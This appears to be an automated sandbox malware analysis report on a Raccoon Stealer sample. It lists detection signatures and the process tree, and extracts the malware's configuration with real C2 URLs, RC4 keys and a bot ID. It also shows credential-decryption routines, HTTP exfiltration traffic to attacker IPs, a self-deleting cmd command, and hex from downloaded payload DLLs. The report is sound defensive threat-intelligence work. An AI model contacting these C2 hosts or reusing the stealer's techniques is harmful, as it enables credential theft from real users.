Play interactive tour

Edit tour

Windows Analysis Report 4FGVZW19n7

Overview

General Information

Sample Name:	4FGVZW19n7 (renamed file extension from none to exe)
Analysis ID:	533993
MD5:	2158d5620e153aad7e5ab2c6069d4405
SHA1:	fe0b5fd32e385fdc7c1629aab131b0e7743b4b4e
SHA256:	42aaeb5b6de2154e8cee56cd6ecd0fac78a38a2162b037d6b8d82eec526a8b1f
Tags:	32exetrojan
Infos:
Most interesting Screenshot:
Errors Sigma runtime error: Invalid condition: all of selection* Rule: Conti Backup Database Sigma runtime error: Invalid condition: all of selection* Rule: Stop Or Remove Antivirus Service Sigma runtime error: Invalid condition: all of selection* Rule: Conti Volume Shadow Listing Sigma runtime error: Invalid condition: all of selection* Rule: Compress Data and Lock With Password for Exfiltration With 7-ZIP Sigma runtime error: Invalid condition: all of selection* Rule: Disable or Delete Windows Eventlog Sigma runtime error: Invalid condition: all of selection* Rule: PowerShell SAM Copy Sigma runtime error: Invalid condition: all of selection* Rule: Compress Data and Lock With Password for Exfiltration With WINZIP

Detection

Raccoon

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Yara detected Raccoon Stealer

Detected unpacking (changes PE section rights)

Tries to steal Mail credentials (via file / registry access)

Contains functionality to steal Internet Explorer form passwords

Machine Learning detection for sample

Self deletion via cmd delete

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sigma detected: Suspicious Del in CommandLine

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Downloads executable code via HTTP

Is looking for software installed on the system

PE file does not import any functions

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Binary contains a suspicious time stamp

PE file contains more sections than normal

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

4FGVZW19n7.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\4FGVZW19n7.exe" MD5: 2158D5620E153AAD7E5AB2C6069D4405)

cmd.exe (PID: 6600 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\4FGVZW19n7.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 4008 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"RC4_key2": "037b6b2d3bac70e32dd9992ce7b7dc3d", "C2 url": ["http://94.158.245.137/duglassa1", "http://91.219.236.27/duglassa1", "http://94.158.245.167/duglassa1", "http://185.163.204.216/duglassa1", "http://185.225.19.238/duglassa1", "http://185.163.204.218/duglassa1", "https://t.me/duglassa1"], "Bot ID": "a1fcef6b211f7efaa652483b438c193569359f50", "RC4_key1": "hGjLqSdWvLpVmBeD"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.326178018.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000000.00000003.282477220.0000000002140000.00000004.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000000.00000002.326412832.00000000020B0000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: 4FGVZW19n7.exe PID: 7084	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.4FGVZW19n7.exe.20b0e50.1.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.2.4FGVZW19n7.exe.400000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.3.4FGVZW19n7.exe.2140000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.2.4FGVZW19n7.exe.400000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.2.4FGVZW19n7.exe.20b0e50.1.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
0.3.4FGVZW19n7.exe.2140000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Del in CommandLine

Show sources

Source: Process started

Author: frack113: Data: Command: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\4FGVZW19n7.exe", CommandLine: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\4FGVZW19n7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\4FGVZW19n7.exe" , ParentImage: C:\Users\user\Desktop\4FGVZW19n7.exe, ParentProcessId: 7084, ProcessCommandLine: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\4FGVZW19n7.exe", ProcessId: 6600

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: 4FGVZW19n7.exe	Virustotal: Detection: 50%			Perma Link
Source: 4FGVZW19n7.exe	ReversingLabs: Detection: 48%

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.4FGVZW19n7.exe.20b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4FGVZW19n7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4FGVZW19n7.exe.2140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4FGVZW19n7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4FGVZW19n7.exe.20b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.4FGVZW19n7.exe.2140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.326178018.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282477220.0000000002140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.326412832.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4FGVZW19n7.exe PID: 7084, type: MEMORYSTR

Machine Learning detection for sample

Show sources

Source: 4FGVZW19n7.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0040E727 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0040CB54 __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0040D560 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0042770E CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0040F78B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_004278E1 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0040DC7B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0041E52C __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00433496 lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Unpacked PE file: 0.2.4FGVZW19n7.exe.400000.0.unpack

Source: 4FGVZW19n7.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: 4FGVZW19n7.exe, 00000000.00000002.326749464.000000006ED10000.00000002.00020000.sdmp, nss3.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: 4FGVZW19n7.exe, 00000000.00000002.326647406.000000006EBE9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr, MapiProxy_InUse.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: 4FGVZW19n7.exe, 00000000.00000002.326647406.000000006EBE9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: ore-memory-l1-1-0.pdb source: 4FGVZW19n7.exe, 00000000.00000003.324233473.000000004B488000.00000004.00000010.sdmp, 4FGVZW19n7.exe, 00000000.00000003.324145874.000000004B488000.00000004.00000010.sdmp, 4FGVZW19n7.exe, 00000000.00000003.324241572.000000004B489000.00000004.00000010.sdmp, 4FGVZW19n7.exe, 00000000.00000002.326563960.000000004B48B000.00000004.00000010.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr, mozMapi32_InUse.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0045E752 FindFirstFileExW,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_00434721 __EH_prolog,GetLogicalDriveStringsA,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49745 -> 194.180.174.40:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: http://94.158.245.137/duglassa1
Source: Malware configuration extractor	URLs: http://91.219.236.27/duglassa1
Source: Malware configuration extractor	URLs: http://94.158.245.167/duglassa1
Source: Malware configuration extractor	URLs: http://185.163.204.216/duglassa1
Source: Malware configuration extractor	URLs: http://185.225.19.238/duglassa1
Source: Malware configuration extractor	URLs: http://185.163.204.218/duglassa1
Source: Malware configuration extractor	URLs: https://t.me/duglassa1

Source: Joe Sandbox View	ASN Name: MIVOCLOUDMD MIVOCLOUDMD
Source: Joe Sandbox View	ASN Name: MIVOCLOUDMD MIVOCLOUDMD

Source: global traffic	HTTP traffic detected: GET /duglassa1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 94.158.245.137
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.40
Source: global traffic	HTTP traffic detected: GET //l/f/EqqPhH0B3dP17Spz-q0u/13167c5f54fcce8683665e37815363c28e6e2bbe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.40
Source: global traffic	HTTP traffic detected: GET //l/f/EqqPhH0B3dP17Spz-q0u/f65289ae65b845a69c17cd35ec8393a2da58e887 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.40
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1400Host: 194.180.174.40

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 04 Dec 2021 21:29:07 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Sun, 14 Nov 2021 14:06:13 GMTETag: "619117d5-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 04 Dec 2021 21:29:11 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Sun, 14 Nov 2021 14:06:12 GMTETag: "619117d4-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 